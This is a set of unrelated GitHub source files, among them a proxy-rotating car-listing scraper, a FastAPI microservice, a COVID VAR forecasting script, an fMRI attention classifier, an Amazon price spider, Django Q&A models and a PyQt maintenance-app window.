'148.251.153.6:1080', '185.134.23.198:80',\n '85.10.219.103:1080', '191.232.170.36:80', '94.141.233.66:53171', '54.38.218.209:6582',\n '54.38.218.214:6582', '176.56.107.140:50177', '61.228.35.49:8080', '110.138.205.217:8080',\n '54.38.155.95:6582', '88.99.10.255:1080']\n s = requests.Session()\n s.proxies = choice(proxies)\n r = s.get(link)\n sleep(1)\n return r.text\n\n\ndef find_listings(txt): #here i can find html of listings on web-pages\n soup = BeautifulSoup(txt,'html.parser')\n listings=soup.find_all('article')\n return listings\n\n\ndef find_data(listing,mark): #finding key data in listing, data is not always exist\n lisitng_link=re.findall(\"\"\"href=\"(.+)\" title\"\"\",str(listing))[0]\n price=listing.find_all(class_='offer-price__number')\n price=re.findall(\"\"\"(.+)\"\"\",str(price))[0].replace(\" \",'')\n price = int(price)\n params=listing.find_all(class_='ds-param')\n try:\n year=int(params[0].get_text().replace(\" \",\"\"))\n except:\n year=0\n try:\n fuel=params[3].get_text().replace(\"\\n\",\"\")\n except:\n fuel = params[2].get_text().replace(\"\\n\", \"\")\n try:\n region=listing.find(class_='ds-location-region').get_text()[1:-1]\n except:\n region=''\n try:\n city=listing.find(class_='ds-location-city').get_text()\n except:\n city=''\n try:\n odometr=int(params[1].get_text().replace(\" \",\"\").replace(\"km\",''))\n except:\n odometr=0\n model=listing.find(class_='offer-title').get_text().replace(\"\\n\",\"\").replace(f'{mark} ','').lstrip().rstrip()\n try:\n m=re.findall(\"(.+) \\d\\..+\",model)[0]\n model=m\n except:\n model=model\n try:\n title = listing.find(class_='offer-title').get_text().replace(\"\\n\", \"\").lstrip().rstrip()\n except:\n title='No title'\n # img_url=listing.find(class_='offer-item__photo ds-photo-container')\n try:\n img_url=re.findall('data-srcset=\"(.+) 768w\"',str(listing.find('img')))[0]\n except:\n img_url='Not found'\n try:\n subtitle=listing.find(class_='offer-item__subtitle ds-title-complement hidden-xs').get_text()\n except:\n subtitle='No subtitle'\n try:\n l_id=int(re.findall('data-ad-id=\"(\\d+)\"',str(listing))[0])\n except:\n l_id=404\n\n try:\n volume=int(params[2].get_text().replace(\" \",\"\").replace(\"cm3\",\"\").replace(\"\\n\",\"\"))\n except:\n volume=1\n # print(lisitng_link,price,year,fuel,region,city,odometr,model,volume)\n data=[lisitng_link,price,year,fuel,region,city,odometr,title,volume,l_id,mark,model,img_url,subtitle]\n return data\n\ndef find_n_pages(link): #it checks how many pages haas each mark but no more than 500 because it is limit of otomoto.pl\n txt=parser(link)\n n=int(re.findall('\\((.+)\\)', txt)[0].replace(\" \",''))//32+1\n\n if n>500:\n n=500\n return n\n\n\ndef format_data(data): # formating data for db\n new_data=\"\"\n for i in data:\n if \"'\" in str(i):\n i=i.replace(\"'\",\"\")\n\n new_data+=f\"'{i}',\"\n return new_data[:-1]\n\n@shared_task()\ndef create_data():\n\n delete_all_data()\n # it will find listing by marks(ex.GAZ).\n # link='https://www.otomoto.pl/osobowe/?search%5Bfilter_enum_damaged%5D=0&search%5Border%5D=created_at_first%3Adesc&search%5Bbrand_program_id%5D%5B0%5D=&search%5Bcountry%5D=&page={}'\n link='https://www.otomoto.pl/osobowe/{}/?search%5Bfilter_enum_has_vin%5D=1&search%5Bfilter_enum_damaged%5D=0&search%5Border%5D=created_at%3Adesc&search%5Bbrand_program_id%5D%5B0%5D=&search%5Bcountry%5D=&page={}'\n marks=['Ferrari', 'Lotus' ,'McLaren', 'Trabant','Tesla']\n # List of marks upper\n\n for mark in marks:\n sleep(1)\n l=0\n n=find_n_pages(link.format(mark.replace(' 
','-'),1))\n        print(f'{n} pages in {mark}')\n        for p in range(1,n+1):\n            page=link.format(mark.replace(' ','-'),p)\n            cann = sqlite3.connect(PATH_TO_DB)\n            cursor = cann.cursor()\n            for listing in find_listings(parser(page)):\n                sleep(2)\n                try:\n                    data=find_data(listing,mark)\n                    data=format_data(data)\n\n                    cursor.execute(\n                        f\"\"\"INSERT INTO Listings VALUES({data})\"\"\")\n                except Exception as e:\n                    print(f'Error {e}\\n{page}')\n                    continue\n                l += 1\n            cann.commit()\n    return 'parsed'\n\n\ndef delete_all_data():\n    # clear the Listings table; the original version called connect() with no path\n    # and executed the database path string as SQL, which could never work\n    cann = sqlite3.connect(PATH_TO_DB)\n    cursor = cann.cursor()\n    cursor.execute(\"\"\"DELETE FROM Listings\"\"\")\n    cann.commit()\n    cann.close()\n\n","repo_name":"AlexFreemann/Greenwood_Django_Project","sub_path":"greenwood/homepage/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":8197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"33151109370","text":"import sys, os; sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\")))\nfrom common.constants import *\nfrom common.logger import logger\nimport time\nimport requests\nfrom fastapi import FastAPI, Body\nimport uvicorn\n\n\n################################################################################\n# app/routes\n################################################################################\n\napp = FastAPI()\n\n\n@app.post(\"/proc_request\")\nasync def route_proc_request(email: str = Body(...), country: str = Body(...)) -> dict:\n    \"\"\"Route - process a user request.\n\n    Args:\n        email (str): The user's e-mail address.\n        country (str): The country whose anthem is requested.\n\n    Returns:\n        dict: {\"status_code\": number, \"status_message\": text}.\n    \"\"\"\n    result = False\n\n    try:\n        if not email or \\\n           not country:\n            raise Exception(f\"Parameter value = null\")\n\n        # Log the user's request to the database, for statistics.\n        response = requests.post(\n            url = MS_DB_URL + \"/journalize_request\",\n            json = {\"email\": email, \"country\": country}\n        )\n        if response.status_code != 200:\n            raise Exception(f\"{MS_DB_NAME}: {response.status_code}-> {response.text}\")\n        data = response.json()\n        if data[\"status_code\"] != \"0\":\n            raise Exception(f'{MS_DB_NAME}: {data[\"status_code\"]} -> {data[\"status_message\"]}')\n\n        # Check whether data for the country is already in the cache.\n        response = requests.post(\n            url = MS_CACHE_URL + \"/get_country\",\n            json = {\"country\": country}\n        )\n        if response.status_code != 200:\n            raise Exception(f\"{MS_CACHE_NAME}: {response.status_code}-> {response.text}\")\n        data = response.json()\n        if data[\"status_code\"] not in \"01\":\n            raise Exception(f'{MS_CACHE_NAME}: {data[\"status_code\"]} -> {data[\"status_message\"]}')\n\n        # The country is not in the cache: call the url processor.\n        if data[\"status_code\"] != \"0\":\n            response = requests.post(\n                url = MS_MB_URL + \"/call_urlp\",\n                json = {\"email\": email, \"country\": country}\n            )\n\n        # The country is in the cache: call the file processor.\n        else:\n            response = requests.post(\n                url = MS_MB_URL + \"/call_fp\",\n                json = {\"email\": email, \"country\": country, \"country_url\": data[\"url\"]}\n            )\n\n        if response.status_code != 200:\n            raise Exception(f\"{MS_MB_NAME}: {response.status_code} -> {response.text}\")\n        data = response.json()\n        if data[\"status_code\"] != \"0\":\n            raise Exception(f'{MS_MB_NAME}: {data[\"status_code\"]} -> {data[\"status_message\"]}')\n\n        result = {\"status_code\": \"0\", \"status_message\": \"Success\"}\n    except Exception as exc:\n        
logger.debug(str(exc), extra = {\"ms\": MS_UI_NAME, \"method\": \"route_proc_request\"})\n result = {\"status_code\": \"-1\", \"status_message\": f\"Something went wrong: {exc}\"}\n\n return result\n\n\nif __name__ == \"__main__\":\n time.sleep(int(MS_UI_RUN_DELAY))\n uvicorn.run(\n app = \"ms_1_ui:app\",\n host = MS_UI_FASTAPI_HOST,\n port = int(MS_UI_FASTAPI_PORT),\n reload = True)","repo_name":"sys321/python_bootcamp_hw_22_2","sub_path":"ms_1_ui/ms_1_ui.py","file_name":"ms_1_ui.py","file_ext":"py","file_size_in_byte":3556,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9884434","text":"import math\n\ndef is_prime(num):\n if isinstance(num, float):\n return False\n try:\n num=int(num)\n if num < 2:\n return False\n for i in range(2, int(math.sqrt(num)) + 1):\n if num % i == 0:\n return False\n return True\n except:\n return \"Please enter a valid number\"\n","repo_name":"esirK/prime-numbers","sub_path":"primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9491405446","text":"import pandas as pd\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom datetime import datetime, date, timedelta\nfrom dateutil import parser\nfrom statsmodels.tsa.vector_ar.vecm import coint_johansen\nfrom statsmodels.tsa.api import VAR\nfrom statsmodels.tsa.stattools import adfuller\nfrom statsmodels.stats.stattools import durbin_watson\nfrom statsmodels.tools.eval_measures import rmse, aic\n#from sklearn.metrics import mean_squared_error\nfrom statsmodels.tsa.stattools import grangercausalitytests\nfrom statsmodels.tsa.stattools import acf\n\n#references: https://www.analyticsvidhya.com/blog/2018/09/multivariate-time-series-guide-forecasting-modeling-python-codes/\n#references: https://www.machinelearningplus.com/time-series/vector-autoregression-examples-python/\ndef date_to_datetime(d):\n # You may need to modify this function, depending on your data types.\n #month = d.month\n #print(month)\n #print(len(d))\n\n if len(d) > 10:\n \tm = re.search(r'(?<=-)\\w+', d)\n \td = m.group(0)\n #m = re.sub(\"([0-9][0-9].)[0-9]+\",\"\" ,d)\n #print(m)\n #value = pd.to_datetime(d, format='%Y%m%d', errors='ignore')\n value = parser.parse(d)\n #print(value)\n #value = time.strptime(value, '%d.%m.%y')\n #print(value)\n value = '%04i-%02i-%02i' % (value.year, value.month, value.day)\n return value\n\ndef get_differences(df):\n\tdf['next_case'] = df['cases']\n\tdf['next_case'] = df['cases'].shift(periods = -1)\n\tdf['difference'] = df['next_case'] - df['cases']\n\t#print(df.head())\n\treturn df\n\n########## read cases csv ######################\n\ndf = pd.read_csv(\"us-states.csv\", header = 0)\n#df = df[['date','state','cases', 'deaths']]\ndf = df[['date','state','cases']]\ndf = df[df['state'] != 'District of Columbia']\ndf['date'] = df['date'].apply(date_to_datetime)\n#df['population'] = df['state'].apply(add_population)\n#df['population_weight'] = df['cases'] / df['population'] * 100\n\n######## Read hospital bed csv ################\n### TRANSFORM DATA BY GROUPBY AND MERGINING DATA ON DATE AND STATE VALUES #########\ndf2 = pd.read_csv(\"covid19-NatEst.csv\", header = 0, index_col = 0)\ndf2 = df2[['State name', 'Day for which estimate is made','Number of patients in an inpatient care location who have suspected or confirmed COVID-19, estimate']]\ndf2 = df2.rename(columns={\"Number of patients in an 
inpatient care location who have suspected or confirmed COVID-19, estimate\" : \"bed amount\"})\ndf2 = df2.rename(columns={'Day for which estimate is made' : \"date\"})\ndf2= df2[df2['State name'] != 'United States']\ndf2 = df2[df2['State name'] != 'District of Columbia']\ndf2['dateTime'] = df2['date'].apply(date_to_datetime)\ndf2 = df2.drop(columns = 'date')\nnew_df = df2.merge(df, left_on=['dateTime','State name'], right_on = ['date','state'], how='left')\nnew_df = new_df.drop(columns = 'dateTime')\nnew_df = new_df.sort_values('date')\n#new_df = new_df.groupby(\"date\").sum().reset_index()\n#print(new_df)\ndata = new_df.drop(columns = 'date', axis = 1)\ndata.index = new_df.date\n\ndata = data.drop(columns = ['state','State name'])\ndata.dropna(inplace=True)\n\n\n####################### VAR model attempt #2 ##########################\n\n\n##### run grangers causation matrix on data to assess if attributes have causality \ndef grangers_causation(data): \n for c in data.columns:\n for r in data.columns:\n result = grangercausalitytests(data[[r, c]], maxlag=2, verbose=False)\n p_values = np.min([result[i+1][0]['ssr_chi2test'][1] for i in range(2)])\n #p_value = np.min(p_values)\n if r != c:\n \tprint(\"p-value for \" + r + \", \" + c + \" is: \" + str(p_values))\n \tif p_values < 0.05:\n \t\tprint(\"Statistically significant!!\")\n\ndf = new_df.drop(columns = ['state','State name'])\ndf = df.groupby(\"date\").sum().reset_index()\ndf = df.set_index('date')\ngrangers_causation(df) \n#granger_test = grangercausalitytests(df, maxlag=2, verbose=True)\n#print(granger_test)\n\n##### run adfuller test on data to assess if stationary #################\ndef adfuller_test(df):\n r = adfuller(df, autolag='AIC')\n p_value = round(r[1], 4)\n if p_value <= 0.05:\n print(\"p-value = \" + str(p_value) + \": Can reject the Null Hypothesis because it seems stationary\")\n else:\n print(\"p-value = \" + str(p_value) + \": Cannot reject the Null Hypothesis because it seems non-stationary\")\n\n#nobs = 4\ndf_train = df[:int(0.9*(len(df)))]\ndf_test = df[int(0.9*(len(df))):]\nprint(df_train.head())\n# Check size\nprint(df_train.shape) \nprint(df_test.shape) \n\n###### difference the dataset to make it stationary #############\ndf_differenced = df_train.diff().dropna()\ndf_differenced = df_differenced.diff().dropna()\n\n###### assess adfuller test ##############\nadfuller_test(df_differenced['bed amount'])\nadfuller_test(df_differenced['cases'])\n \n\n###create and fit model \nmodel = VAR(df_differenced)\nmodel_fit = model.fit(maxlags=7, ic='aic')\nprint(model_fit.summary())\n\nlength = (len(df_test))\ncolumns = ['bed amount_differenced2', 'cases_differenced2']\nforecast_mf = model_fit.forecast(y=df_differenced.values[-model_fit.k_ar:], steps=length)\nforecast_df = pd.DataFrame(forecast_mf, index=df.index[-length:], columns=columns)\n#print(forecast_df)\n\n\n#references: https://www.machinelearningplus.com/time-series/vector-autoregression-examples-python/ \n### need to invert data back to initial form before seeing outcome of data ##########\ndef invert_transformation(df_train, df_forecast, second_diff=False):\n df = df_forecast\n for col in df_train.columns: \n if second_diff:\n df[str(col)+'_differenced'] = (df_train[col].iloc[-1]-df_train[col].iloc[-2]) + df[str(col)+'_differenced2'].cumsum()\n df[str(col)+'_prediction'] = df_train[col].iloc[-1] + df[str(col)+'_differenced'].cumsum()\n return df\n\ndef inverse_difference(history, yhat, interval=1):\n\treturn yhat + history[-interval]\n\ndf_results = 
invert_transformation(df_train, forecast_df, second_diff=True) \n#print(df_results)\n\n\n###### plot the results of VAR ###########\nfig, axes = plt.subplots(ncols=2,figsize=(10,5))\nfor i, (col,ax) in enumerate(zip(df.columns, axes.flatten())):\n df_results[col+'_prediction'].plot(legend=True, ax=ax).autoscale(axis='x',tight=True)\n df_test[col][-length:].plot(legend=True, ax=ax);\n ax.set_title(col + \": Forecast vs Actuals\")\n\nplt.tight_layout();\nplt.show()\n\ndef f_accuracy(forecast, actual):\n mape = np.mean(np.abs(forecast - actual)/np.abs(actual)) \n print(\"MAPE is: \" + str(mape))\n rmse = np.sqrt(np.mean((forecast - actual)**2))\n print(\"RMSE is:\" + str(rmse))\n\n \n######## PRINT ACCURACY VALUES #####################\nprint('Accuracy of: bed amount')\naccuracy_prod = f_accuracy(df_results['bed amount_prediction'].values, df_test['bed amount'])\nprint('\\nAccuracy of: cases')\naccuracy_prod = f_accuracy(df_results['cases_prediction'].values, df_test['cases'])\n\nmodel_fit.plot_forecast(50)\nplt.show()\n\n\n\n","repo_name":"ehughson/covid19_forecasting","sub_path":"VAR.py","file_name":"VAR.py","file_ext":"py","file_size_in_byte":6945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5842404223","text":"\n# coding: utf-8\n\n# In this exercise we will decode orientation using data collected for the Cognitive Neuroscience module in 2017. The subject performed a task that manipulated whether attention was placed towards the left or right visual field, or with no attentional focus (control condition).\n#\n# Notes from Dan:\n#\n# *v1_tseries are the time series files, as voxel * volume matrices\n# *v1_r2 are the variance explained per voxel by the FIR model with three conditions for task=0/1/2\n# design is a long form matrix (rows are individual events, first column are volumes and second column trial type) indicating the volume at which the different trial types occurred, 0 = neutral task (press button when stimulus cross changes color), 1 = attend left side and detect the direction of rotation, 2 = attend right side and detect the direction of rotation\n#\n# Stimulus was two gabor patches left and right of fixation flickering at 5 Hz.\n#\n# fixate: 500 ms\n# task cue: 500 ms\n# ISI: 1000 ms\n# stimulus: 4000 ms\n# change+resp: 1500 ms\n# var ITI: uniform distribution between 2500 and 9500 ms\n#\n# From staring at the deconvolutions it seems like the optimal time window to be looking at to separate trial types starts basically with the stimulus at 2 s, you start seeing task/neutral separation immediately and then by ~3-4 s you start seeing separation by left/right in most voxels.\n#\n# ##### Load data\n#\n# First we load the data files.\n\n# In[308]:\n\nimport random,os,json,glob,pickle\nimport numpy,pandas\nimport nibabel\nimport sklearn.multiclass\nfrom sklearn.svm import SVC,LinearSVC\nimport sklearn.metrics\nimport sklearn.model_selection\nimport sklearn.preprocessing\nimport scipy.stats,scipy.io\nimport random\n\n\ndatadir='data'\n\nprint('using data from %s'%datadir)\nlv1_ts=scipy.io.loadmat(os.path.join(datadir,'lv1_tseries.mat'))['lv1']\nrv1_ts=scipy.io.loadmat(os.path.join(datadir,'rv1_tseries.mat'))['rv1']\n# scale the data so that we don't need to bother with intercept in the 
model\nlv1_ts=sklearn.preprocessing.scale(lv1_ts.T)\nrv1_ts=sklearn.preprocessing.scale(rv1_ts.T)\ntsdata={'leftV1':lv1_ts,'rightV1':rv1_ts}\n\ndesmtx=scipy.io.loadmat(os.path.join(datadir,'design.mat'))['design']\nlabels=desmtx[:,0]\nntrials=desmtx.shape[0]\nntp,nvox=lv1_ts.shape\nprint(ntrials,'trials')\nprint(nvox,'voxels')\nprint(ntp,'timepoints')\nlv1_ts.shape\n\n\n# In[160]:\n\n# Reproduce the deconvolution analysis using an FIR model\n# the onset times are in volumes, so we just use tr=1\n# use 20-second window\n\ndef make_fir_model(onsets,tslength,hrflength=48,tr=1):\n \"\"\"\n generate an FIR model design matrix\n this only works for a single condition\n \"\"\"\n\n X=numpy.zeros((tslength,int(hrflength/tr)))\n for i in range(hrflength):\n for o in onsets:\n try:\n X[o+i,i]=1\n except:\n pass\n return X\n\ndesmtx_df=pandas.DataFrame(desmtx,columns=['condition','onset'])\nonsets={}\nonsets['neutral']=desmtx_df.query('condition==0').onset.values\nonsets['attendleft']=desmtx_df.query('condition==1').onset.values\nonsets['attendright']=desmtx_df.query('condition==2').onset.values\n\nleft_fir=make_fir_model(onsets['attendleft'],ntp)\nright_fir=make_fir_model(onsets['attendright'],ntp)\nneutral_fir=make_fir_model(onsets['neutral'],ntp)\nfir=numpy.hstack((left_fir,right_fir,neutral_fir))\n\n# show the design matrix\nprint(fir.shape)\n\n\n# In[161]:\n\n# estimate the model\n\nbeta_hat_left=numpy.linalg.inv(fir.T.dot(fir)).dot(fir.T).dot(lv1_ts)\nbeta_hat_right=numpy.linalg.inv(fir.T.dot(fir)).dot(fir.T).dot(rv1_ts)\n\npred_left=fir.dot(beta_hat_left)\n\n\n# In[162]:\n\n# check fit of the model over first 500 timepoints\nmeanpred=sklearn.preprocessing.scale(pred_left.mean(1))\n\npred_left.mean(1).shape\n\n\n# #### Classification analysis\n#\n# Now let's fit a classifier using balanced 8-fold crossvalidation. For now we only include attention trials. We will fit the classifier at each time point along the trial timecourse. 
We use a nested crossvalidation loop to determine the classifier parameters for each dataset.\n\n# In[338]:\n\ndef run_classifier(data,labels, shuffle=False,nfolds=8,scale=True,\n clf=None,verbose=False):\n \"\"\"\n run classifier for a single dataset\n \"\"\"\n features=data\n if scale:\n features=sklearn.preprocessing.scale(features)\n if shuffle:\n numpy.random.shuffle(labels)\n if not clf:\n clf=sklearn.svm.SVC(C=C)\n skf = sklearn.model_selection.StratifiedKFold(5,shuffle=True)\n pred=numpy.zeros(labels.shape[0])\n for train, test in skf.split(features,labels):\n clf.fit(features[train,:],labels[train])\n pred[test]=clf.predict(features[test,:])\n if verbose:\n print(clf.best_params_)\n acc=sklearn.metrics.accuracy_score(labels, pred)\n return acc\n\n\ndef get_accuracy_timeseries(tsdata,labels_attend,onsets,shuffle=False,clf=None,window=40,\n voxels=None):\n \"\"\"\n iterate over timepoints\n \"\"\"\n acc=numpy.zeros(window)\n for tp in range(window):\n # pull out data for each trial/timepoint\n if voxels is None:\n data=numpy.zeros((len(labels_attend),tsdata['leftV1'].shape[1] + tsdata['rightV1'].shape[1]))\n else:\n data=numpy.zeros((len(labels_attend),tsdata[voxels+'V1'].shape[1]))\n\n ctr=0\n for cond in ['attendleft','attendright']:\n for ons in onsets[cond]:\n if voxels is None:\n data[ctr,:]=numpy.hstack((tsdata['leftV1'][ons+tp,:],tsdata['rightV1'][ons+tp,:]))\n else:\n data[ctr,:]=tsdata[voxels+'V1'][ons+tp,:]\n\n ctr+=1\n acc[tp]=run_classifier(data,labels_attend,clf=clf,shuffle=shuffle)\n return acc\n\nlabels_attend=numpy.array([i for i in labels if i > 0])\n\n#clf=sklearn.linear_model.LogisticRegressionCV(penalty='l1',solver='liblinear')\n#clf=sklearn.svm.SVC(C=1)\ntuned_parameters = [{'C': [0.0005,0.001,0.005,0.01,0.05, 0.1]}]\nclf = sklearn.model_selection.GridSearchCV(sklearn.svm.LinearSVC(C=1), tuned_parameters, cv=5,n_jobs=6)\n\nprint('running for all')\nacc_all=get_accuracy_timeseries(tsdata,labels_attend,onsets,clf=clf)\nprint('running for left')\nacc_left=get_accuracy_timeseries(tsdata,labels_attend,onsets,voxels='left',clf=clf)\nprint('running for right')\nacc_right=get_accuracy_timeseries(tsdata,labels_attend,onsets,voxels='right',clf=clf)\n\n\n# #### Plot the results\n\n# In[339]:\n\n\n\n# Now let's run it with the labels shuffled 100 times to see how good these results are compared to chance. This will take a few minutes to complete. 
For a real analysis one would want to do this many more times (up to ~5000) in order for the distribution of extreme values to stabilize.\n\n# In[ ]:\n\n# if the saved results already exist then just reload them, to save time\nif 1:\n nruns=20\n hash='%08x'%random.getrandbits(32)\n acc_all_rand=numpy.zeros((nruns,40))\n acc_left_rand=numpy.zeros((nruns,40))\n acc_right_rand=numpy.zeros((nruns,40))\n\n for i in range(nruns):\n print(i)\n acc_all_rand[i,:]=get_accuracy_timeseries(tsdata,labels_attend,onsets,shuffle=True,clf=clf)\n acc_left_rand[i,:]=get_accuracy_timeseries(tsdata,labels_attend,onsets,voxels='left',shuffle=True,clf=clf)\n acc_right_rand[i,:]=get_accuracy_timeseries(tsdata,labels_attend,onsets,voxels='right',shuffle=True,clf=clf)\n pickle.dump((acc_all_rand,acc_left_rand,acc_right_rand,clf),open('shuffled_accuracy_%s.pkl'%hash,'wb'))\n\n\n# Now we plot those results alongside the true classification results, adding an asterisk at the timepoints where the observed accuracy is greater than the 99th percentile of the random accuracies.\n\n# In[ ]:\n\nrand_percentile=99 # percent cutoff for randomization\n","repo_name":"poldrack/fmri-analysis-vm","sub_path":"analysis/MVPA/CogNeuro2017/ClassficationAnalysis-attention.py","file_name":"ClassficationAnalysis-attention.py","file_ext":"py","file_size_in_byte":7712,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"52"} +{"seq_id":"20585078430","text":"'''\n백준1005번\nACM Craft\n'''\nimport sys\nsys.setrecursionlimit(10**8)\n\nINF = 10**12\narr = []\ndef dfs(target):\n if len(dic[target])==0:\n visited[target]=bt[target]\n return bt[target]\n minBt = 0 \n for x in dic[target]:\n val = 0\n if visited[target]==-1:\n val = dfs(x)\n else:\n val = visited[x]\n minBt = max(minBt, val)\n visited[target] = minBt+bt[target]\n return minBt+bt[target] \n\nT = int(input())\nfrom collections import defaultdict\n\nfor t in range(T):\n N, K = map(int,input().split())\n bt = list(map(int,input().split())) #build time\n visited = [-1] * (N+1) \n dic = defaultdict(list)\n for k in range(K):\n x,y = map(int,sys.stdin.readline().split())\n dic[y-1].append(x-1)\n\n target = int(input())-1\n dfs(target)\n print(visited[target])\n","repo_name":"tjddls1124/Algorithm","sub_path":"baekjoon/baek1005.py","file_name":"baek1005.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13482945720","text":"import scrapy\r\nfrom fp.fp import FreeProxy\r\nfrom random_user_agent.params import OperatingSystem\r\nfrom random_user_agent.user_agent import UserAgent\r\n\r\nfrom AmazonWatcher.items import AmazonItem\r\n\r\n\r\nclass ItemscraperSpider(scrapy.Spider):\r\n name = 'itemscraper'\r\n allowed_domains = []\r\n\r\n def start_requests(self):\r\n self.item_id = getattr(self, \"item_id\", None)\r\n user_agent_rotator = UserAgent(operating_systems=[\r\n OperatingSystem.LINUX.value, OperatingSystem.WINDOWS.value], limit=100)\r\n start_urls = [\r\n f'https://www.amazon.in/dp/{self.item_id}'\r\n ]\r\n\r\n for url in start_urls:\r\n proxy = FreeProxy(timeout=1, rand=True, anonym=True).get()\r\n yield scrapy.Request(url=url, callback=self.parse,\r\n meta={\"proxies\": proxy},\r\n headers={\r\n \"User-Agent\": user_agent_rotator.get_random_user_agent()}\r\n )\r\n\r\n def parse(self, response):\r\n title = response.xpath(\r\n '//*[@id=\"productTitle\"]/text()').extract_first().strip()\r\n price = response.xpath(\r\n 
'//*[@id=\"priceblock_ourprice\"]/text()').extract_first()\r\n\r\n if not price:\r\n price = response.xpath(\r\n '//*[@id=\"priceblock_dealprice\"]/text()').extract_first()\r\n price = \"\".join(i for i in price if i.isdigit()\r\n or i == \".\").split(\".\")[0]\r\n\r\n item = AmazonItem(\r\n title, f\"https://www.amazon.in/dp/{self.item_id}?tag=gravity47-21\", price, self.item_id)\r\n\r\n yield item\r\n","repo_name":"VikrantReddy/AmazonWatcher","sub_path":"AmazonWatcher/spiders/itemscraper.py","file_name":"itemscraper.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1579297510","text":"from django.db import models\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nfrom django.contrib.auth.models import User\n# Create your models here.\nclass qasession(models.Model):\n name = models.CharField(max_length=255)\n teacher = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n start = models.DateTimeField(blank=True, null=True)\n end = models.DateTimeField(blank=True, null=True)\n status = models.IntegerField(default=0, validators=[MinValueValidator(0), MaxValueValidator(1)])\n detail = models.CharField(max_length=1000)\n create_at = models.DateTimeField(auto_now_add=True)\n close_at = models.DateField(blank=True, null=True)\n\nclass question(models.Model):\n owner = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n qa = models.ForeignKey(qasession, on_delete=models.CASCADE, null=True)\n content = models.TextField(max_length=2000)\n create_at = models.DateTimeField(auto_now_add=True)\n\nclass answer(models.Model):\n owner = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n ques = models.ForeignKey(question, on_delete=models.CASCADE, null=True)\n content = models.TextField(max_length=2000)\n create_at = models.DateTimeField(auto_now_add=True)\n\nclass comment(models.Model):\n owner = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n ans = models.ForeignKey(answer, on_delete=models.CASCADE, null=True)\n content = models.TextField(max_length=2000)\n create_at = models.DateTimeField(auto_now_add=True)\n","repo_name":"nmthang153/QA-WebAppDev","sub_path":"QAsession/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9243260843","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom .. 
import icons_rc\nfrom ..BonTravailViews.BonTravailList import Ui_Dialog as Bontravail_UI\nfrom ..BonTravailViews.BonTravailConsulter import Ui_Dialog as BontravailConsulter_UI\nfrom ..DemandeInterventionViews.DemandeInterventionList import Ui_Dialog as DemandeIntervention_UI\nfrom ..DemandeInterventionViews.DemandeInterventionConsulter import Ui_Dialog as DemandeInterventionConsulter_UI\nfrom ..EquipementViews.EquipementList import Ui_Dialog as Equipement_UI\nfrom ..EquipementViews.EquipementConsulter import Ui_Dialog as EquipementConsulter_UI\nfrom ..BonApprovisonnementViews.BonApprovisionnementList import Ui_Dialog as BonApprovisionment_UI\nfrom ..BonApprovisonnementViews.BonApprovisionnementConsulter import Ui_Dialog as BonApprovisionmentConsulter_UI\nfrom .ListeUser import Ui_Dialog as ListeUser2\nfrom .Dashboard import Ui_Dialog as dashboard\nfrom PyQt5.QtWidgets import *\nfrom Services import ResponsableMaintenanceServices,ResponsableProductionServices,ResponsableChaineProductionServices,MagasinierServices\n\nfrom .Dashboard import Ui_Dialog as Dashboard_UI\nfrom ..Components.CollapsibleBox import CollapsibleBox\n\n\n\nfrom ..Components.Notifications import NotificationThread,Notification\nclass Ui_MainWindow(QtCore.QObject):\n\n \n def __init__(self,matricule,role,dialogSignIn,window) -> None:\n super(Ui_MainWindow,self).__init__()\n self.matricule = matricule\n self.role = role\n self.dialogSignIn=dialogSignIn\n self.window=window\n self.NotificationObject=Notification(self.window,self.matricule)\n \n def slideLeftMenu(self,x):\n if x==\"1\":\n width=self.left_side_menu.width()\n if width ==75:\n newwidth=285\n else:\n newwidth=75\n self.animation=QtCore.QPropertyAnimation(self.left_side_menu,b\"minimumWidth\")\n self.animation.setDuration(250)\n self.animation.setStartValue(width)\n self.animation.setEndValue(newwidth)\n self.animation.start()\n if x==\"2\":\n width=self.left_side_menu.width()\n if width ==75:\n newwidth=285\n self.animation=QtCore.QPropertyAnimation(self.left_side_menu,b\"minimumWidth\")\n self.animation.setDuration(250)\n self.animation.setStartValue(width)\n self.animation.setEndValue(newwidth)\n self.animation.start()\n if x==\"3\":\n width=self.left_side_menu.width()\n if width ==285:\n newwidth=75\n self.animation=QtCore.QPropertyAnimation(self.left_side_menu,b\"minimumWidth\")\n self.animation.setDuration(250)\n self.animation.setStartValue(width)\n self.animation.setEndValue(newwidth)\n self.animation.start()\n\n\n \n \n\n def handleadd(self):\n self.adduser = QtWidgets.QDialog()\n self.ui_adduser =ListeUser2(self.stackedWidget)\n self.ui_adduser.setupUi(self.adduser)\n self.stackedWidget.addWidget(self.adduser)\n self.stackedWidget.setCurrentWidget(self.adduser)\n\n def affdash(self):\n \n self.affda = QtWidgets.QDialog()\n self.ui_affda =dashboard()\n self.ui_affda.setupUi(self.affda)\n self.stackedWidget.addWidget(self.affda)\n self.stackedWidget.setCurrentWidget(self.affda)\n\n\n def displayBonTravail(self):\n self.dialogBonTravail = QtWidgets.QDialog()\n self.uiBonTravail = 